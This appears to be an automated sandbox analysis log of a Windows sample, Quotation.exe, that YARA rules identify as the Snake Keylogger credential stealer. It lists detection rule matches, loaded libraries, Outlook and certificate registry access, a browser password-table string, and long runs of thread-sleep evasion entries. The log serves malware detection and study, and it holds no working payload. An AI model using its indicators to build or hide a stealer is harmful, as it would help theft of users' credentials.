Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_005E743F	0_2_005E743F
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_005EC218	0_2_005EC218
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_005E55E0	0_2_005E55E0
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_005E5830	0_2_005E5830
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_005E39AC	0_2_005E39AC
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C2A088	0_2_00C2A088
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C2C146	0_2_00C2C146
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C2D278	0_2_00C2D278
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C25362	0_2_00C25362
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C2C468	0_2_00C2C468
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C2C738	0_2_00C2C738
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C2E988	0_2_00C2E988
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C269A0	0_2_00C269A0
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C2CA08	0_2_00C2CA08
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C2CCD8	0_2_00C2CCD8
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C26FC8	0_2_00C26FC8
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C2CFAB	0_2_00C2CFAB
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C2F961	0_2_00C2F961
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C2E97B	0_2_00C2E97B

Source: Quotation.exe, 00000000.00000000.1633874804.0000000000496000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Quotation.exe
Source: Quotation.exe, 00000000.00000002.4103434254.00000000008F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Quotation.exe
Source: Quotation.exe	Binary or memory string: OriginalFilenameRemington.exe4 vs Quotation.exe

Source: Quotation.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Quotation.exe, type: SAMPLE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Quotation.exe, type: SAMPLE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Quotation.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Quotation.exe PID: 2168, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Quotation.exe, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Quotation.exe, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Quotation.exe, ---.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.winEXE@1/0@4/4

Source: C:\Users\user\Desktop\Quotation.exe

Mutant created: NULL

Source: Quotation.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Quotation.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\Quotation.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Quotation.exe, 00000000.00000002.4104956397.0000000002C43000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Quotation.exe	ReversingLabs: Detection: 71%
Source: Quotation.exe	Virustotal: Detection: 70%

Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Quotation.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Quotation.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C29C30 push esp; retf 00C9h		0_2_00C29D55
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_00C2BDA5 pushfd ; iretd		0_2_00C2BDAA

Source: C:\Users\user\Desktop\Quotation.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: 2990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: 27B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599419	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594613	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Window / User API: threadDelayed 1167			Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Window / User API: threadDelayed 8647			Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 5908	Thread sleep count: 1167 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 5908	Thread sleep count: 8647 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -599419s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -594613s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6724	Thread sleep time: -593985s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599419	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599188	Jump to behavior
